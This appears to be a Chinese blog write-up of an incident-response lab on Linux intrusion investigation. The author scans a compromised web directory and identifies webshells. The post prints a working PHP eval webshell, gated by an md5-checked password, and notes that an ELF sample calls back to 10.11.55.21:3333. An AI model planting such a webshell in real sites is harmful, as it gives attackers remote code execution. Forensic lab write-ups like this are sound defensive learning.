做一做玄机、 学一学应急。 做了几个突然想起。博客开个贴子记录下来也是挺好的😋

第一章 应急响应- Linux入侵排查

  1. web目录存在木马,请找到木马的密码提交

登录上服务器,将web目录打包。下载下来用d盾扫一波

image-20250408211831936

1.php内容

image-20250408212035313

.shell.php内容

image-20250408212154309

index.php内容

image-20250408212409124

index.php作用是在 /var/www/html/下生成.shell.php然后在.shell.php中写入<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

这个马的密码是hello

image-20250408212732746

网站目录下面还有一个 shell(1).elf

image-20250408220936143

放进ida里面看了一下,发现自己根本看不懂image-20250408221017667

就起了一个docker 将它在docker里面执行了一下

image-20250408221050277

然后再看网络连接状态netstat -antlp

image-20250408221056343

连接了10.11.55.21:3333